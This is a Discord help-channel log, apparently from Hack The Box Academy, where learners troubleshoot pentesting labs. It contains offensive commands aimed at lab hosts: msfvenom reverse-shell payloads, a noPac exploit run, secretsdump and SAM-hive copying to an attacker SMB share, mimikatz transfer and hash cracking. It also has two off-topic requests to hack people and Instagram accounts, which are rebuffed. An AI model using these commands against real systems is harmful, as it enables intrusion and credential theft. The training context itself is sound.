for PW attacks yes; because PW attack is a brutal one

many people struggle on that

I think it depends on the module. Some have really poor questions, or aren't applying something directly that was taught.

couple times the hint got nothing to do with finding the answer or flag

that as well; basically relying on you having some pre-existing knowledge of some of the other commands thrown at you

I'd say that as long as you're learning and understanding, it's not such a big deal to use the hints. The only module you really want to do without hints is the 'Attacking Enterprise Networks' module.

how many modules are out there on the academy??

tons

cpts covers 28 modules, cbbh covers 22, (not sure how many overlap) then there's fundamental ones

overlaps 11 modules

cbbh has 20 modules

as far as i know

and

There's significant overlap. I've only done CPTS modules, and I'm 57% complete with the bug bounty path.

around 60-70 modules

though think if the modules are part of a skill or job path they put the modules in certain order and the modules already assume you took those previous modules. They do say on some modules that knowledge of previous modules is required prerequisite knowledge.

And many Tier III and Tier IV which are not the part of either

yep

letme count

but overall the modules in cpts should be enough to have you pass cpts. same with cbbh

61 modules in total

im gonna do cpts first then cbbh then rest of the modules

don't lose your head

lol hopefully i wont but it gets frustrating asf sometimes

Where we practice after completing module??

https://www.hackthebox.com/ 😛

After every module, you can see there are suggested boxes on HTB

Thank 🙏

most modules have their own practice lab(s) at the end as well; but if you've done a lot of the getting started stuff then Starting point box/machines are a good place to get a foothold of your knowledge

Hi. I would like to know if HTB academy subscription provide access to HTB box to practice modules.

been stuck on the AD skills assessment for a bit so trying to brush up on pivoting so make tool use easier

can anyone tell me the difference in the /etc/proxychains.conf files?

most guides say to edit /etc/proxychains.conf, but on kali I only see /etc/proxychains4.conf

or am i overthinking it, and current version is just 4.x so that was added to the filename?

yeah its just a version thing

okay good deal, wasnt getting a clear answer when googling, and even the pivoting module specifies /etc/proxychains.conf but maybe thats what its named on the parrot box

No a subscription on the academy site is different than the box site

can anyone give me a nudge on footprinting medium lab? i have no clue how to get in

There are free boxes on htb anyway

Okay thank you

Use the one that's there already.

Where are you stuck?

i cant find the creds of sa

Did you enum other services that are there?

yeah

i logged into the rdp

got it

nvm

thanks

🙂

but my rdp connection keeps dying

hey sorry to bother you but its throwing up an error whenever it try to login using sa's password

Send me a dm

kindly check dm

yo

I'm trying to do AD - Bleeding edge but my exploit keeps failing for some reason

these are the commands I'm running and you can see on the left prompt the error I am getting, does anyone have any pointers?

You might have to explain yourself a bit better. Noone is going to try and read through your screenshot lol

aight. I'm trying to use cube0x0's CVE-2021-1675. Supposedly I have to craft a payload with msfvenom, which I did. I then have to host this payload on an smb share, which is what the right shell is doing. And then I have to run the actual exploit (left window) except i get the following error:

impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x35 - ERROR_BAD_NETPATH - The network path was not found

so i figure maybe I wrote the path wrong but I don't see where

Check if any firewall is blocking incoming connections

ufw status numbered

I have to run this on the machine I'm attacking?

If the local firewall looks good try escaping your backslashes in the smb path

No, your own

Your kali machine

Or parrot or whichever

you command doesn't seem to be recognized by the parrot machine i'm sshed to

Ok good good

escaping backslashes doesn't seem to solve the problem

Ok, have you tested the smb path yourself somehow?

Just to check that the file is present in the share you expect

I seem to be able to connect to ////IP/CompData just fine using smbclient

if I try to run ls i get an error tho, is that relevant?

Possibly

Depends which error

NT_STATUS_NO_SUCH_FILE listing *

The original error you're seeing means that the remote box is looking at your (at that point UNC) path, tries to download the resource and goes "hmm, that's not right.."

What you want to try to figure out is which of the many possibilities of that communication going wrong is causing you trouble

the command I used to create the smb server is the following:

sudo smbserver.py -smb2support CompData ./payload.dll

is that correct?

What I like to try in this case, I.e. when I think something is right but I'm not sure, is to try a simpler example

E.g. Trying to expose just a simple dir on smb

Then you can always add extra prams and such

I would expect the last input to be a folder name, but I don't remember the syntax by hand

ohhhh

you're good man

Ok it still doesn't work but my path was indeed wrong

Ah, progress ::D

It's like riding a bike: you never entirely forget.. 😂

Too many hours spend yelling at a terminal for that

Hey there, I am trying to solve AD & NTDS.dit password cracking section

I am finding some issue when trying to copy NTDS.dit file from the shadow C:

not sure why the command is not recognize, though the shadow is created succesfully

any hint?

thx

seems that is not copying the file 🤔

can I dm u?

I'm lost on Nmap medium lab.

hello ,i have windows ,no linux

cmd

What's the question? What have you tried? Where are you stuck?

help me in footprinting hard lab
snmp is open port i tried to enumerate snmp with onesixtyone but nop no results

onesixtyone -c snmp.txt [ip]

I'm pretty sure that's the right command, can you DM me your command and output?

ok

Hello! I need help with the "Network enumaration with nmap" in the "Firewall and IDS/IPS Evasion - Medium Lab". I think is Module 19, section 118. Please!

I think I found the answer but when I try to submit it I get a wrong answer, I am pretty sure I found the right flag

Dm your flag to check

ok, thanks!

look what you can find in the home folder of d. maybe you can reuse it for someone else.

Thank you sir, I’m actually finished with the module! I appreciate you coming back though. Hopefully this will help others if they search. 🙂

hey @hazy grotto can I dm you real quick?

Certainly!

Hello! I need help with the "Network enumaration with nmap" in the "Firewall and IDS/IPS Evasion - Medium Lab". I think is Module 19, section 118. Please!

Try running an nmap scan with a different protocol. One that is connectionless.

ok thanks, I was trying to capture the flag with tcpdump

no problem, feel free to direct message me if you need further assistance.

Hyy

hey guys this photo,hack web xD

ftp

Hloo9

Hey can I use the PWN Box in HBA for learning blackeye?

No outside targets

a general question is there no keyword defined as cookies in python
while i was declaring it python was giving an error and was fixing it by cookie instead of cookies
if someone can help :0

I'm not sure I understand your question. Python does not have a lot of keywords and I doubt cookies, or cookie is one of them.

you can get a list of Python keywords with: ` import keyword

print(keyword.kwlist)`

You must be using a module in Python

Hello! I'm on the Skills Assessment - File Upload Attacks and trying to do the ||xxe|| in order to leak the source code of the Web App and find the ||upload directory||.

The base64 code give me my payload, and not the source code. Can someone help me?

p.s. Happy New Year to everyone!

Question about using chisel based on what's in the proxy/tunnel section of the CME module. It describes using the server from the victim but I don't understand why you'd do that since you can always use --reverse options to control directions.

yeah was using the reqeust lib in python

Can soemone please tell me what im missing on the attacking common services medium skills assesment? I found 4 open ports || ssh, dns, pop3 and pop3s || I cant even try to get into ||pop3|| without a username and i dont see how id get that from ||dns||. I know im missing something, probably something pretty obvious, but i dont know what

i reset the machine and now there are 2 more ports open

Anyone for small question about Enumerating and attacking active directory module ?

Potentially

I am on redeemer and I keep getting the error code to my nmap script saying its "illegal"

hi all.

On SQLMap Essentials - Skill Assessment, just need a check on some syntax.

|| sqlmap -u http://<HOST-TARGET><PORT>/<hidden>.php --data '{"id":1}' --batch --dump --tamper=b****** ||

I'm getting "unable to retrieve db names"

Skill assessment completed alone ! yippee DM if you need help!

You'll have more luck posting in #boxes

thats not showing up for me in the discord channels

You need to verify your account. Check the rules

In the module ATTACKING COMMON APPLICATIONS / WordPress - Discovery & Enumeration, any idea how to find the first question: "Enumerate the host and find a flag.txt flag in an accessible directory."? I've been through all the folders of http://blog.inlanefreight.local/wp-content/plugins/mail-masta and http://blog.inlanefreight.local/wp-content/plugins/contact-form-7/ don't know where else to search

So doing the File Transfer module and the optional assessment for Windows Uploads. Running into an issue on the RDP where making calls to outside websites via curl or the Powershell thing isn't working. any ideas on this?

someone?

@rustic sage dm me

Download the file you want to your attack amchine and host it on your own http server

HTB machines cant reach out to the internet

Just finished the Attacking Common Services modules. Those skills assesments were really fun. I think the medium and easy should have their names swapped tho

The hard skills assessment is beautiful

Now i have to do Pivoting and then I can finally start the AD module

BRO

linux or windows?

Hammer or screwdriver?

feta or asiago

In the Active Directory module / Bleeding Edge Vulnerabilities ,
the Nopac method doesn't seem to work. Any idea what's wrong with this command? python3 /home/sarah/Téléchargements/noPac/noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 10.129.110.11 -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap

███ ██ ██████ ██████ █████ ██████
████ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██████ ███████ ██
██ ██ ██ ██ ██ ██ ██ ██ ██
██ ████ ██████ ██ ██ ██ ██████

[-] If ssl error, add -use-ldap parameter to connect with ldap. Error: socket connection error while opening: [Errno 111] Connection refused

no

bro serius

Its a serious answer

bro yes

Use the tool for the job

ym new is this server

ym italy

sometimes windows is necessary, sometimes linux is necessary

nobody cares

also this channel is for academy module discussion, keep it on topic

ok

go verify your account in #welcome and then ask your random questions in general chat

yea

hack web in ftp xD

https://tenor.com/view/hacker-pupper-dog-hacker-computer-keyboard-gif-17954501

xD

I'm struggling to understand something in File Transfers: Linux File Transfer Methods, download with Bash.

What exactly is exec 3<>/dev/tcp/10.10.10.32/80 doing?

I know that exec is running a command, I'm assuming that 3 is a file descriptor, but I only know of STDOUT(1) and STDERROR(2) - so what's 3?

WHAT BRO ,no have linux

So the <> is the diamond operator, and opens a file for reading and writing. So I'm assuming that first command opens /dev/tcp on the target box for down and upload?

stdin too

Oh yeah, that's 0 right?

iirc yeah

im assuming 3 is shorthand for all three but I could be wrong

So I think 3 is actually anything you want it to be. I've found this recourse which is quite good: https://catonmat.net/bash-one-liners-explained-part-three

So you could do something like this:

exec 5<> file and that opens 'file' for read and write and assigns it to file descriptor 5.

so it looks like that's what's happening in: exec 3<>/dev/tcp/10.10.10.32/80 we assigning that folder/port to fd 3 for reading and writing.

Can anyone help with the SMTP footprinting final exercise? I've run the command multiple times and also tried metasploit but I either get results saying that none of the accounts exist or all of them exist... 😅

And yes I also set the reply timeout to 15 and 20

I also tried using different modes

GG

And when running VRFY manually I always get a 252 (yes I know what it indicates), which is what we're "warned" about int he module

Use the list provided in resources

And yes, did that too

Did you try all the different methods for user enumeration?

the common tools default to one method out of the recommended three, but iirc only one of em actually works for the practical and its not the default

Yes, also tried using different modes

of you are using the user enum tool this should be right also for metasploit i got no note about having to set any delay so metasploit should also work try restart your target machine

I'll try restarting thne

Delay is needed for the metasploit module, not sure how to replicate that in the args line

just to make sure the metasploit part in me mote is right i just give it a try and still found the right user without any delay

also there is no option for delay 🤣

Usually it's the -W argument

In meta

oh wait no i found the delay option i'm dumb

Is there a script arg delay option?

it's set to 10 but in the enum tool you need to use at least 15 or 20 so that's kinda weird

in metasploit?

also this is right but for the user enum tool

No, using the nmap route

yep i found this tag on nmap site --scan-delay

Yes but I think that's for the scan itself, not the script

oh for that i think you have to experiment a lot with some of nmap rate tag

Still the same results

With VRFY all usernames are valid, EXPN none of them are

The -w option is for smtp-user-enum btw

I don't see one for emtsploit

I don't have notes on the excersizes for the footprinting module.

iirc you need to add the -d flag (domain)

yup, did that

I got nothing then

Sorry

I think I used the RCPT mode as well

Are you sure you used the rcpt mode thiugh

I think so, but I don't have notes on that excersize 😅

Oh no worries I got my wires crossed

thats 2/3 recommended methods, ya try the third one

Yes, same as VRFY, all exist

https://tenor.com/view/crazy-jim-carrey-weird-gif-9170373

try without the domain if that still doesn't work shoot me a dm if with your command

f me

no domain owrked

thank you

Thanks

can someone help me with Pass the Hash module. I am stuck on David's Hash. I am attempting to Invoke-SMBExec and I am getting does not have service control Manager write permissions. So I attempted to RDP into his account on the Target, then network into 172.16.1.10 and I can see all of the shares, but do not have permissions to the shares with Davids account.

Hi everyone ! i'm having a headache about NMAP - Firewall & IDS/IPS Evasion: Medium Lab; i'm missing something with the filtered port, begging for help ❤️

For the IMAP question, I'm submitting the flag I found but it's incorrect

Not sure how to fix this... There are no extra spaces

Ah my mistake, the flag I found is for another question

module and section: xss phising

I tested the link i made with the steps it showed me and did the entering test and test as username and password and i was able to capture it through the php server and it worked, but when i send it to the "victim" in /phising/send.php it says url sent, but it isnt working and i wont receive anything

i used my ifconfig tun0 10.10.xx.xx ip

command injection assessment (Permission denied). i need some hint

so i figured out how to get SMBexec to work and there are a few ways to get the flag on this one. I encourage everyone to take the time to figure out how to get SMBExec to actually run on this module because it opens up another foothold if there was more to the box.

Hey guys. Yesterday I was having issues with cracking hashes. I couldn't crack a hash but was able to pass it.

today i wanted to see if it would do it again. Would some please take a look and see why hashcat and john the ripper both wont run? They both say exhausted and quit after 5 seconds.

$ hashcat -m 1000 thm.hash /home/ruderaph/Downloads/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.0+debian Linux, None+Asserts, RELOC, LLVM 13.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]

• Device #1: pthread-Intel(R) Core(TM) i7-10750H CPU @ 2.60GHz, 3923/7911 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashfile 'thm.hash' on line 2 (CBFDAC...8F9CAB4083784CBD1874F76618D2A97 ): Token length exception
Hashfile 'thm.hash' on line 3 (1C8BFE...2AA37FC4CCE4FC946683D7B336B63032): Token length exception
Hashfile 'thm.hash' on line 4 ($2y$12...eeUznr71EeNkJkUlypTsgbX1H68wsRom): Token length exception

• Token length exception: 3/5 hashes
  This error happens if the wrong hash type is specified, if the hashes are
  malformed, or if input is otherwise not as expected (for example, if the
  --username option is used but no username is present)

Hashes: 2 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:

• Zero-Byte
• Early-Skip
• Not-Salted
• Not-Iterated
• Single-Hash
• Single-Salt
• Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:

• Filename..: /home/ruderaph/Downloads/rockyou.txt
• Passwords.: 14344384
• Bytes.....: 139921497
• Keyspace..: 14344384

Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1000 (NTLM)
Hash.Target......: 279412f945939ba78ce0758d3fd83daa
Time.Started.....: Mon Jan 2 17:51:24 2023 (4 secs)
Time.Estimated...: Mon Jan 2 17:51:28 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/home/ruderaph/Downloads/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 4310.7 kH/s (0.10ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 0/14344384 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b6d3831303838] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 38%

Started: Mon Jan 2 17:51:24 2023
Stopped: Mon Jan 2 17:51:29 2023

have you checked your pot file

can someone plz help me

🙂 hey. Would you tell me what that is?

I run hashcat on my windows machine, so I can use my GPU, so I am not 100% sure if the folder structure is the same on Kali/Linux

Ok i see some hashes that are cracked but non that im trying to do.

send me the file your trying to crack

@hazy grotto I just grepped over rockyou.txt with the password that crackstation gives and it doesn't show in the list

Well... I was doing the hardlab yesterday...

And someone alot smarter than me was helping me. I was using the same wordlists as him and everything i tried wasn't working.....

which hardlab?

When in doubt check crackstation 😐

password attacks

nice im in the middle of it right now, just finished Pass the Hash section

So if i was running rockyou..... wouldn't take longer than 5 seconds to go through the list?

would you mind DMin me your notes for getting Davids Flag. I want to compare

DM and i can help

Seems so

I was really weirded out at some point because john was stopping after 2-3 seconds with a zip file

Seems like I just had the wrong wordlist

Not that they weren't long

if you already ran it before it might be in a cache and just skipping it to not waste time

But if you're using non-mutated wordlists you might aswell go to crackstation

Saves you time and headaches

I'm going through my notes runnign the same commands as before which had results. Nothing is working for it anymore.

john --wordlist=mut_password.list doc.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
No password hashes left to crack (see FAQ)

No hashes left to crack means its already in your potfile. Run john --show doc.hash

Modules that do brute forcing without some kind of direction should really be removed. -_-

Most of them arent bad. Usually itll only take a few minutes max. But there are a few sections that are ridiculously long. I believe thyre being worked on

I just did the gitlab user enumeration section, and there's really no reason not to tell you which list to use.

iirc the hints give a suggested user list if not stated in the module outright for the gitlab one

The section used a custom wordlist, so I didn't see anything that would hint to which one to use. I just started with the smaller ones, and moved up, but I can imagine many newer users might use the bigger lists, and complain about timeouts/machine expiring.

Hello, I'm having some trouble with something from the File Transfer Module. I'm trying to test the wsgidav python server on my linux box, and connecting to it from my windows host machine. After configuring the server like the example shows, I keep getting a "Cannot find path [ipaddress]\DavWWWRoot because it does not exist" error. Could this be a Firewall issue or am I missing something? Never used wsgidav before. Thank you in advance. ----Also, I have been able to connect to it every other way described in the module

@stuck hull hey, sorry i logged off. mind if i dm you about that Nmap medium lab?

hello i want to　download to macbook hornycraft

anyone got any quick hints with the Login Brute Forcing Skill Assessment - Website? The first section is just "bruteforce this" with no information and I've been just going through various wordlists for hours. Basically just do you know what lists will have what I need

figured it out. anyone looking for help, you'll have to use the || -C || flag, and look back through what you've already done

Hello! I need help with the "Network enumaration with nmap" in the "Firewall and IDS/IPS Evasion" - HARD Lab. Module 19, section 119. Please!

Anyone around to help me troubleshoot reverse ssh port forwards? Im trying to get a meterpreter shell from the windows machine but for some reason metasploit wont accept the connection? I can catch shell using ncat but when i try to use metasploit i get nothing

Im heading to sleep for the night, but ill try to provide as much info as I can so that hopefully I wake up to an answer.

Reverse Port forward command:
ssh -R 172.16.5.129:8443:0.0.0.0:8000 ubuntu@10.129.69.138 -vN

MSFVenom Command:
msfvenom -p windows/shell_reverse_tcp LHOST=172.16.5.129 LPORT=8443 -f exe -o shell.exe

Using the above reverse port forward and the payload generated with the above command, im able to get a reverse shell no problem when executing from the internal windows machine (screenshot attatched)

Reverse Port forward command:
ssh -R 172.16.5.129:8443:0.0.0.0:8000 ubuntu@10.129.69.138 -vN

MSFVenom Command:
msfvenom -p windows/x64/meterpreter/shell_reverse_https LHOST=172.16.5.129 LPORT=8443 -f exe -o shell.exe
(Same payload used in the SSH Reverse Port Forward example)

Multi handler Settings:
set LHOST 0.0.0.0
set LPORT 8000
set payload windows/x64/meterpreter/shell_reverse_https

With the above setup, now I just dont get a callback. I can see the connection happening in the Reverse Port Forward log, but metasploit just sits and does nothing. Dosent say connection recieved, dosent say exploit failed, nothing. It just keeps listening

try with a normal shell instead of the meterpreter shell

I did

The image I attached is the shell I got

A regular shell works fine

I can't figure out why I can't get a meterpreter shell tho

I’ve just started my cybersecurity journey, does htb have a free learning course for the same or paid?

oh that just because a meterpreter shell is way too big to route through 2 netowrk

But wouldn't I at least get the "exploit completed but no session was created" message? Or an exploit failed message?

I get zero output in metasploit

the academy have free module in tier 0 and i think 1 also if you are new to this and want some free stuff to get started check out tryhackme free path

nope i think the shell just doesn't go through or something

Hmm. Interesting. Cuz I noticed that if I use the wrong payload I get the "failed to open session" output

try it on the pwnbox because on there the shell doesn't have to go through a second network (your vpn) so the meterpreter shell should work n there

oh that is Interesting

So I was thinking maybe it's something with the https payload

But I'm not sure

I'm getting back on to play with it more now lmao

can anyone help me with imap? like how to get the id of a msg in a mailbox?

I need help with the "Network enumaration with nmap" in the "Firewall and IDS/IPS Evasion" - HARD Lab. Module 19, section 119. Please!

it's not explained well but think of it as a LIST not necessarily a specific ID #

I had to google that one myself

you need to change the source port somehow

i been stuck on the hard lab

footprinting

idk how to grab the mail

I was right. Its something about the https payload. I just got a meterpreter session using reverse_tcp

oh wait what?

Yep

Im throughly confused now

just told you :) it's not necessarily a specific ID like ahu4968590; it's more about think of it as picking from a list

trying again with http to see if its specifically the https payload, or if its the way metaploit handles http requests in general

Ok, so its gotta be something specific about the https payload

cuz http worked perfectly fine

maybe it's a weird syntax difference?

I dont think so

It just sits here when using the https payload.

huh... like it's stuck in transit phase

I can see the request coming through in the reverse forward log

Its gotta be something with the way metasploit handles https requests

Cuz http works perfectly fine

retro term?

yes

cool

Well, thats enough for tonight. Im tired and dont have the energy to look into this now. Will attempt to figure it out tommorow morning

😴

is it normal for nmap to take a really long time when running through proxychains? with -sT -Pn flags on the default ports

Yeah. Life is painful when ran through proxychains. Source: doing a prolab...

I suppose it depends how long though? You can hit an unbound key and it'll give you status

"Nmap done: 1 IP address (1 host up) scanned in 1698.46 seconds"

eventually got the results, but wasn't expecting that

Half an hour? Is that with services and stuff too?

was just proxychains -q nmap -sT -Pn 172.16.6.50

is there a way to manually dump a user's ntlm hash in AD, provided I'm authority/system?

a living off the land method

you mean like a native powershell command? xD no. you can save hklm system and sam and dump back on your host machine.

ok, basically I have an authority/system shell on a machine with no tools and I am tasked with retrieving a specific user's password, do you have an idea on how to do that?

are you doing a module?

yeah

the active directory module?

AD attacking domain trusts from linux

yes

can you not just... put your own tools on there

i don't think these modules have defender running even.

my notes for that section of the module are using secretsdump.

can you use secretsdump with a golden ticket?

I tried to but i might have miswrote the command because it asked for a password

is it the DA bross question?

yeah

If you scroll up in the section it has all the syntax there.

it does?

I see the syntax for getting into the system but I don't see dumping hashes

wait have you already got the psexec shell sorry. just set up smb server and copy hklm\system hklm\sam over then

it says I can't access the smb share I'm trying to upload the saves to because of company policy

oh because you needed to specify creds with this module for smb servers. sorry 🤦

i don't have specific notes on how I obtained the hash, so just assuming I did secretsdump or mimikatz or something

secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/bross should just dump their hash, no?

the section has you dump creds from krbtgt in my notes. i'm guessing given the question you can just do bross instead of krbtgt then.

idk why I didn't write down what I did. I can only assume it was straight forward haha sorry.

@candid zephyr for the AD skills assessment, any advice on using secretsdump ? have had my session interrupted 4 times now before it can finish

nah it doesn't work

@candid zephyr what's wrong with my syntax?

you have to specify a filename. so move sam.bak \ipadd\folder\sam.bak. if you've created a user locally then you specify the credswhen making smb server. smbserver -smb2support compdata . -user hacker -password Password!

i've no idea why your instance is borked 😦

even w/ full filepath for sam.save i get the same error

it runs for a while, but there are loads of users, and the meterpreter session dies somewhere deep in the process lol

on your kali machine do smbserver.py -smb2support sharename . -user our1 -password our1

then on the box you wtransfer do net use \ipadd\sharename /u:our1 our1

then copy sam.bak \ipadd\sharename\sam.bak

You should be good to go then.

Alternatively you can copy mimikatz from your smbserver to the box and do it that way. copy \ipadd\share\mimikatz.exe mimikatz.exe

i think the way it initially teaches you (looking at the module rn) is with mimikatz.

I went back to it after screaming into a pillow and found a much simpler way. You were right in saying I could use secretsdump for this task and the correct syntax is: secretsdump.py logistics.inlanefreight.local/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -just-dc-user bross

Anyone finsh the shells and payload section? I cant seem to get this right?
Where is the Laudanum aspx web shell located on Pwnbox? Submit the full path. (Format: /path/to/laudnaumaspx)

have you tried find / -name laundanumaspx ?

i tried something similar. Let me try that. But i get permission denied with that.

even as root

try in your command ||laudanum*||

or just ||laudanum||

you're root so there's really no reason to get permission denied

try using sudo

hello. linux priv esc - skill assessment - flag5. well. I have a nc shell and a meterpreter but cant figure out how to esc priv. whatever I try, I am just coming empty handed. Please someone push me to a right direction

well I am totally lost

Yeah i dont get it. I even reset the box and am still getting the same thing.

maybe you just dont have priv to see that file

why don't you try to ||search where the laudanum shell is usually stored and browse there||

anyone for this one?

@pliant sage Thats what i did originally. The only file there is shell.aspx

have you submitted the full path of this file?

I need help with the "Network enumaration with nmap" in the "Firewall and IDS/IPS Evasion" - HARD Lab. Module 19, section 119. Please!

I did that also

Are there any efficient ways of running hashcat separate from my machine? Im using a laptop on a VM so everything is pretty limited. I tried a Linode server like a 1GB one, but it didn't have enough allocatable memory. Update I tried the pwnbox and that says I'm looking at 7 days to crack one hash. There must be a better way

@pliant sage I see what you mean. I submitted the path but not included the file name

Thanks

did it work?

Yeah that worked. I dont see why it needs the file name but it does clearly state the full path.

great!

Thanks

hello guys german guys here??

Ja

@feral pecan

@austere tide oh nice kann ich dir pn schreiben ?

module pwd attacks / section Passwd, Shadow & Opasswd - question: Examine the target using the credentials from the user Will and find out the password of the "root" user. Then, submit the password as the answer.

when they say credentials from Will

do they refer to the previous section?

cause in the previous section I only captured firefox creds

if you guys can support before i start the practice would appreciate

thx!

i'm not sure if I should have captured additional creds

😬

Hello all, is there an issue with targets?

I have trouble connecting to targets spawned

no that I know

after a while it turns unresponsive and I have to respawn since yesterday

any body can help me ?? ,how to connect the vpn server?

sudo openvpn <file_name>

Great resource I found for IMAP commands:

https://www.atmail.com/blog/imap-101-manual-imap-sessions/

can anyone help me in : Skill Assessment - Broken Authentication

wtf

bro

Well the answer to the previous question was the password fir the "Will" user. So if you finished the previous section you have the passwrod

1234

password

Great thx

25340'9865879'40539687'28'5298'2849053'280495'809358'3427627'5490385340985 Wi-Fi

noononon

xD

ym live on twitch bro

Can any of the #mods take care of this

LOL

@carmine kiln this guy above when you can pls ... thx

cheers!
I am working on the footprinting module and the last DNS question is making me bang my head against the desk. I bet I am thinking to difficult for this, but its no fun anymore. I dont get it. Any help would be much appreciated

Where have you got to?

I found the second NS but cannot bruteforce both domains to get a system with .203

You need to find a really ||fierce|| wordlist.

wow, okay. got it

I think I tried every other but that one. Shouldve been more thorough. Thanks for the help!

Is there a way to see the hints after subbmiting the answer or is it just best to always check the hint first?

Yes. You should be able to see the hints after submission - try refreshing the page.

What if the password wasn’t nibbles. What should we do?

What should I do after activating machine in HTB

It shows you are offline

Refresh

Refresh the page

Connect to HTB and show offline

This worked. Thank you!

Have you connected to the vpn?

Not able to connect

What?

VPN

Yes you need to connect first

From where?

Your attack box

Your kali or parrot machine

I have kali

Have you done this yet?https://academy.hackthebox.com/module/details/15

That explains how the platform works and how to connect to a box

Thanks

Looking for some help on the Broken Authentication Skill Assessment. I have a list of users and feel I've filtered the list according to the password policy, but I'm unable to login. Anyone finished this that could provide a hint?

I finished the SNMP section, but I'm wondering how to know what OIDs to query?

My guess would be, unless you know of one through some other enumeration - brute force and look for something interesting.

The OID for the script on the host is pretty long and I tried looking it up step by step but the reference page only know up to about half of the full OID

Ah I see

anyone on Password attacks - section Passwd, Shadow & Opasswd sec

https://academy.hackthebox.com/module/147/section/1319

to get a hint on the question: Examine the target using the credentials from the user Will and find out the password of the "root" user. Then, submit the password as the answer.

thx

I not able to open vpnfile

Openvpn academy-regular.ovpn not working in my kali

@solar granite Hey! Can I DM you regarding this? I guess I found which parameter is vulnerable but I can't see where the output is on the html...

Can you help me with this? I think I found the injection parameter but I can't see the results in the html response

It shows option error

Any one??

sudo

@west canopy What do you mean "a little bit off" here?

i added that

and as well i have logged in as root

Download a new vpn pack

Is the error a certificate error?

Hello I'm glad I can join this community I don't know where to start

Anyone know of any modules or tutorials on how to use UACMe.

I saw it mentioned in the "Printer Operators" tasks from the Windows Priv Esc module.
I tried to use UACme (Akagi64.exe) and used a key which the OS version is vulnerable but it didn't work. I did the exact same thing in the UAC part section and it did work. I just need some more explanation and example usage of this tool.

Hi Team, can somebody give me a hand on the Vulnerability Assessment module, I tried the first Nessus Skills Assesment, spawn the machine Target but seams to be a Linux one and after the scan all Answer are incorrect. The page talk about another ip that I cannot ping, Bref A little bit confused

Hi all, on the linux fundementals module I was working on the following question:
Which kernel version is installed on the system? (Format: 1.22.3)
The version on the machine is 5.18.0
But the right answer is: 4.15.0 which is actually an outdated one, I had been searching for quite a while..
Does this often happen with future tasks as well?
If so is it possible to work with an outdated version instead?

Have you logged into the target?

Hello! How can I hack a person using their IP adress?
I hacked a lot of people with grabify, want to profit from that.

this is not the place

familiarise yourself with the #rules

lmao you hacked nobody with grabify thats not even hacking

Oh I am sorry

I get the ip

thats not hacking

IP isnt secret information

its active recon at best

It's not the visible ip

It's hardware ip

I just need to know how to use it

that makes 0 sense

skids gunna skid

I used spawn target option.

okay, but have you logged into the target?

theres no such thing as "hardware ip", ip addresses are assigned

madf0x, please drop it

ok

There is visible ip, sites see it.
There is hardware ip, like a device ID

Im guessing I have not logged into the target yet?
as I'm not entirely sure what you mean by that.

use the provided credentials in the section of the module, they are in the exercise

ah found it, thanks!

Does anyone know how to hack ig accounts?

ig?

yeah

instagram

lol

Oh

Lol

💀

price?

Is this HTB:academy modules channel a joke?

Dms

yall really need to read the rules

ColdWind (762396486679396382) has been banned until 2023-01-31 19:41:34 (UTC).

this is not the place

most of the server channels require being verified to view, but the academy section doesn't, so it often becomes a dumping ground for new people that spam,scam,troll, or just plain dont even glance at the rules

Its always white names causing problems

How can we report them`

?

Tag whatever mod is online atm

I think one of em said there were plans to improve the situation but ya know with servers large as this things move slowly

How should I learn scripting for pentesting? Should I do it before or during the time I take the Pentesting job path?

Id probably say before hand

you wont need it too much for the course, but a ton of things will be 10x harder if you dont have a little understanding beforehand

Any tips on how to learn scripting?

Learning scripting isnt much different from learning programing, just at a smaller scale. Start with something like bash scripting since you def use that in the course, and then pickup a little python too. I highly recommend after at least learning a little enough about php to not get totally intimidated reading it.

with the hyphen as well lol. that was annoying, i knew the answer immediately but had to submit about 10-20 answers to get it correct 🤦‍♂️

Powershell stuff will also go a long way and is used throughout the course

Alright, thanks man. I have a good understanding of Python, and I just started a book on bash scripting. Just not sure what I actually need to make

Just remember, you dont need to master the subjects, you just need to understand enough so that when youre looking at it youre not totally lost

I will try to ask my question again as to much trolls wrote at the same time in the chat... Hi Team, can somebody give me a hand on the Vulnerability Assessment module, I tried the first Nessus Skills Assesment, spawn the machine Target but seams to be a Linux one and after the scan all Answer are incorrect. The page talk about another ip that I cannot ping, Bref A little bit confused

Did you log into the target?

they give you a host box that has an internal network with the real targets

how can I log into the target??

It should tell you the creds

Hello I need help with the Passwd, Shadow & Opasswd section under Password Attacks module. I have found the passwd.bak and shadow.bak files and transferred them to my host, unshadowed them I believe and then attempted to use hashcat but to avail.

Am I doing something incorrect?

There is just a button to spawn target

TBF, it literally is written like that in the text.... :p

Right above the firsr question is says to authenticate as the user htb-student with password

Although it would never be written like that by anyone that I've met.

yes I saw that but I dont know how to login

It says in the scneario description to log into the web interface

